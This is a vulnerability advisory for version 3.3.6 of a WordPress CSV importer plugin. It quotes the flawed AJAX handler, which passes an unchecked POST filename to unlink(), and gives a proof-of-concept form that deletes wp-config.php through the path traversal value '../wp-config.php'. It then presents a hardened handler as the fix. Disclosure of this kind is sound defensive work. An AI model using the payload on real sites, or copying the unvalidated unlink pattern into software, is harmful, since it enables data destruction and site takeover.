Details
- Name : Woocommerce CSV importer
- Version : 3.3.6
- Homepage : https://wordpress.org/plugins/woocommerce-csvimport/
Type
- Arbitrary File Deletion
- Remote Code Execution - RCE
Description
- Required access: any registered user.
- $_POST['filename'] is not escaped or validated before it is passed to unlink().
Code
File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php
Line: 64
    public function delete_export_file() {
        if ( isset( $_POST['filename'] ) ) {
            @unlink( $_POST['filename'] );
        }
        wp_die( 0 );
    }
Proof of Concept
https://www.youtube.com/watch?v=By7kT7UbHVk
1 - Log in as any user.
2 - Submit the form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
<input type="text" name="filename" value="../wp-config.php">
<input type="submit">
</form>
Results
wp-config.php is deleted and the whole system restarts.
Note
Solution
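One way to harden the handler shown under Code, as an added example (not the vendor's fix and not code from the plugin). The export directory name, the nonce action and field, the .csv restriction and the required capability are assumptions; the hook name is taken from the action parameter in the request above.

```php
<?php
// Added example: hardened variant of delete_export_file().
// Assumed (hypothetical): exports live in <uploads>/csvimport-exports, the nonce
// action is 'woocsv_delete_export', and only shop managers may delete exports.

/** Resolve a user-supplied name to a file inside $base_dir, or return null. */
function woocsv_resolve_export_path( $base_dir, $filename ) {
    // Keep only the last path component: "../wp-config.php" becomes "wp-config.php".
    $name = basename( str_replace( '\\', '/', (string) $filename ) );
    if ( '' === $name || '.' === $name || '..' === $name ) {
        return null;
    }
    // Only export files (assumed to be .csv) may be deleted.
    if ( 'csv' !== strtolower( pathinfo( $name, PATHINFO_EXTENSION ) ) ) {
        return null;
    }
    $base = realpath( $base_dir );
    $path = realpath( $base_dir . DIRECTORY_SEPARATOR . $name );
    if ( false === $base || false === $path ) {
        return null; // directory or file does not exist
    }
    // After symlink resolution the file must still sit directly in the export dir.
    if ( dirname( $path ) !== $base || ! is_file( $path ) ) {
        return null;
    }
    return $path;
}

function woocsv_delete_export_file() {
    // Reject forged requests, then users who lack the capability.
    check_ajax_referer( 'woocsv_delete_export', 'nonce' );
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( -1, 403 );
    }
    $uploads = wp_upload_dir();
    $dir     = $uploads['basedir'] . '/csvimport-exports';
    $raw     = ( isset( $_POST['filename'] ) && is_string( $_POST['filename'] ) )
        ? wp_unslash( $_POST['filename'] )
        : '';
    $path    = woocsv_resolve_export_path( $dir, $raw );
    if ( null === $path ) {
        wp_die( 0 );
    }
    wp_die( unlink( $path ) ? 1 : 0 );
}
add_action( 'wp_ajax_delete_export_file', 'woocsv_delete_export_file' );
```

With this check the value ../wp-config.php from the form above is reduced to wp-config.php and rejected, because it is not a .csv file inside the export directory.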
Timeline
- Date Discovery : 11/23/2017
- Date Vendor Contact : 12/29/2017
- Date Publish :
- Date Resolution :